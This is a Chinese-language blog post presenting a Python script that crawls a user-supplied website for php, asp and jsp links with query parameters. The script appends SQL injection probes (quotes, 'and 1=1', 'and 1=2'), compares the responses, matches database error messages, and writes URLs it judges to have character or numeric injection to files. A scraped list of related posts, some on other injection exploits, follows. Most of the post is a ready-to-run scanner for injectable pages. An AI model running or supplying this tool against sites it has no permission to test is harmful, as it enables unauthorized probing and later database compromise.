前言:

昨天晚上其实就已经写完代码。只不过向FB投稿了,打算延迟一晚上在写博客

所有才到今天早上写。好了,接下来进入正题。

思路:

1.从网站源码中爬取那些类适于:http://xxx.com/xx.php?id=xxx的链接

2.将这些爬取到的链接写入一个URL

3.加入payload

4.用正则过滤掉一些残缺不全的链接

5.将一些报错语句加入一个列表

6.从报错的语句中寻找错误

7.判断字符型注入或数字型注入

代码:

 import requests,re,time,os

 from tqdm import tqdm

 from bs4 import BeautifulSoup

 def zhuru():

     global x,headers,ps

     user=input('[+]Please enter the URL you want to test:') #用户输入要检测的网站

     url="{}".format(user.strip()) #去除两边的空格

     headers={'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}

     request=requests.get(url,headers) #浏览器头

     shoujiurl=[] #创建一个收集URL链接的列表

     rse=request.content

     gwd=BeautifulSoup(rse,'html.parser')

     php=gwd.find_all(href=re.compile(r'php\?')) #寻找后缀名为php的链接

     asp=gwd.find_all(href=re.compile(r'asp\?')) #寻找后缀名为asp的链接

     jsp=gwd.find_all(href=re.compile(r'jsp\?')) #寻找后缀名为jsp的链接

     print('[+]Collection URL ')

     for i in tqdm(range(1,500)): #进度条

         time.sleep(0.001) #进度条

     for lk in php:

         basd=lk.get('href') #提取其中的链接

         shoujiurl.append(basd) #加入列表

     for ba in asp:

         basd2=ba.get('href') #提取其中的链接

         shoujiurl.append(basd2) #加入列表

     for op in jsp:

         basd3=op.get('href') #提取其中的链接

         shoujiurl.append(basd3) #加入列表

     print('[+]Collection completed')

     huixian=[]

     huixian1 = "is not a valid MySQL result resource"

     huixian2 = "ODBC SQL Server Driver"

     huixian3 = "Warning:ociexecute"

     huixian4 = "Warning: pq_query[function.pg-query]"

     huixian5 = "You have an error in your SQL syntax"

     huixian6 = "Database Engine"

     huixian7 = "Undefined variable"

     huixian8 = "on line"

     huixian9 = "mysql_fetch_array():"

     huixian.append(huixian1)

     huixian.append(huixian2)

     huixian.append(huixian3)

     huixian.append(huixian4)

     huixian.append(huixian5)

     huixian.append(huixian6)

     huixian.append(huixian7)

     huixian.append(huixian8)

     huixian.append(huixian9)

     for g in huixian:

         ps="".join(g) #过滤掉[]

     payload0="'"

     payload1="''"

     payload2="%20and%201=1"

     payload3="%20and%201=2"

     for x in shoujiurl:

         yuan="".join(x) #过滤掉[]

         ssdx="".join(x)+payload0 #添加payload

         ssdx2="".join(x)+payload1

         ssdx3="".join(x)+payload2

         ssdx4="".join(x)+payload3

         pdul=re.findall('[a-zA-z]+://[^\s]*',ssdx) #过滤掉一些残缺不全的链接

         pdul2=re.findall('[a-zA-z]+://[^\s]*',ssdx2)

         pdul3=re.findall('[a-zA-z]+://[^\s]*',yuan)

         pdul4=re.findall('[a-zA-z]+://[^\s]*',ssdx3)

         pdul5=re.findall('[a-zA-z]+://[^\s]*',ssdx4)

         psuw="".join(pdul) #过滤掉[]

         psuw2="".join(pdul2)

         psuw3="".join(pdul3)

         psuw4="".join(pdul4)

         psuw5="".join(pdul5)

         try:

             resg=requests.get(url=psuw,headers=headers,timeout=6)

             resg2=requests.get(url=psuw2,headers=headers,timeout=6)

             resg3=requests.get(url=psuw3,headers=headers,timeout=6)

             resg4=requests.get(url=psuw4,headers=headers,timeout=6)

             resg5=requests.get(url=psuw5,headers=headers,timeout=6)

             if resg.status_code == 200: #判断状态码是否等于200

                 print('[+]The first step is completed, and the goal is to be stable')

                 time.sleep(1)

                 if resg.content != resg2.content and resg3.content == resg2.content:  #判断是不是字符型注入

                     print('[+]Existence of character injection')

                     print(resg3.url)

                     print(resg3.url,file=open('character.txt','a')) #如果是写入脚本

                 elif resg4.content != resg5.content and resg4.content == resg3.content: #判断是不是数字型注入

                     print('[+]Digital injection')

                     print(resg3.url)

                     print(resg3.url,file=open('injection.txt','a')) #如果是写入脚本

                 else: #两者都不是

                     print('[+]Sorry, not character injection')

                     print('[+]Sorry, not Digital injection')

                     print(resg3.url)

                 if ps in str(resg2.content):

                     print('[+]The wrong sentence to be found',ps)

             elif resg.status_code != 200:

                 print('http_stode:',resg.status_code)

                 print('[-]Sorry, I cant tell if there is an injection')

         except:

           pass

 zhuru()

测试结果如下:

python打造一个分析网站SQL注入的脚本的更多相关文章

  1. python打造一个Mysql数字类型注入脚本(1)

    前言: 总是想写一个sql注入脚本,但是之前的那些都不行. 这次做好了准备,然后嘿嘿嘿. 准备: sql注入的基础知识 熟悉怎么判断 正文: 思路概念图: 这里我没有限制用户输入,不限制的话可能会 @ ...

  2. 点击劫持漏洞之理解 python打造一个挖掘点击劫持漏洞的脚本

    前言: 放假了,上个星期刚刚学习完点击劫持漏洞.没来的及写笔记,今天放学总结了一下 并写了一个检测点击劫持的脚本.点击劫持脚本说一下哈.= =原本是打算把网站源码 中的js也爬出来将一些防御的代码匹配 ...

  3. Python预编译语句防止SQL注入

    这个月太忙,最近不太太平,我的愿望是世界和平! ================================== 今天也在找python的预编译,早上写的sql是拼接来构成的.于是找了2篇文章,还 ...

  4. phantomjs + python 打造一个微信机器人

    phantomjs + python 打造一个微信机器人 1.前奏   媳妇公司不能上网,但经常需要在公众号上找一些文章做一些参考,需要的时候就把文章链接分享给我,然后我在浏览器打开网页,一点点复制过 ...

  5. python之MySQL学习——防止SQL注入

    python之MySQL学习——防止SQL注入 学习了:https://www.cnblogs.com/xiaomingzaixian/p/7126840.html https://www.cnblo ...

  6. 一个PHP的SQL注入完整过程

    本篇文章介绍的内容是一个PHP的SQL注入完整过程,现在分享给大家,有需要的朋友可以参考一下 希望帮助到大家,很多PHPer在进阶的时候总会遇到一些问题和瓶颈,业务代码写多了没有方向感,不知道该从那里 ...

  7. Zabbix sql注入漏洞脚本执行反弹shell

    exp检测是否存在SQL注入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+------------------------------------ ...

  8. zabbix(sql注入判断脚本)

    zabbix(sql注入判断脚本) #-*-coding:utf-8-*- # code by anyun.org import urllib import re def getHtml(url): ...

  9. python 打造一个sql注入脚本 (一)

    0x00前言: 昨天刚刚看完小迪老师的sql注入篇的第一章 所以有了新的笔记. 0x01笔记: sql注入原理: 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作. sql ...

随机推荐

  1. JavaScript的作用域链

    /* js当中 每个函数都是一个执行环境 函数调用函数会进入新的执行环境结束之后再回来当前 作用域链: 在内部的作用域中可以访问和修改外部的变量 在外部作用域不能修改或者访问内部的变量 */ var ...

  2. 关于web XSS注入问题

    对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,附带公司写的一个filer. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经 ...

  3. 解决-Django使用filter过滤时间,无法获取月份的问题

    django中的filter日期查询属性有:year.month.day.week_day.hour.minute.second 但是但我在使用过滤查询是却总是无法过滤出月份,各种查资料,最后才发现是 ...

  4. How to preview html file in our browser at sublime text?

    sublime preview html.md open In Browser what should we do if we want to preview html file in our bro ...

  5. [LeetCode] Erect the Fence 竖立栅栏

    There are some trees, where each tree is represented by (x,y) coordinate in a two-dimensional garden ...

  6. 跨域访问 - 跨域请求 同源策略概念对跨域请求的影响 及几种解决跨域请求的方法如 jsonp

    为什么会设置同源策略 > 适用于浏览器的一种资源访问策略 > 同源策略(Same origin policy)是一种约定,它是浏览器最核 心也最 基本的安全功能,如果缺少了同源策略,则浏览 ...

  7. cmseasy CmsEasy_5.6_20151009 无限制报错注入(parse_str()的坑)

    来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0137013.html parse_str()引发的注入, //parse_str()的作用是 ...

  8. .Net Core小技巧 - 使用Swagger上传文件

    前言 随着前后端分离开发模式的普及,后端人员更多是编写服务端API接口.调用接口实现文件上传是一个常见的功能,同时也需要一个选择文件上传的界面,可以编写前端界面上传,可以使用Postman.curl来 ...

  9. bzoj 2437: [Noi2011]兔兔与蛋蛋

    Description Solution 考虑犯错误的条件:之前是处于必胜状态,该操作之后就变成了必败状态. 我们可以把这个过程看成两人对网格图进行黑白染色,变成了一个二分图模型,即当前位置向相邻不同 ...

  10. [HDU]4694 Important Sisters(支配树)

    支配树模板 #include<cstdio> #include<cstring> #include<algorithm> using namespace std; ...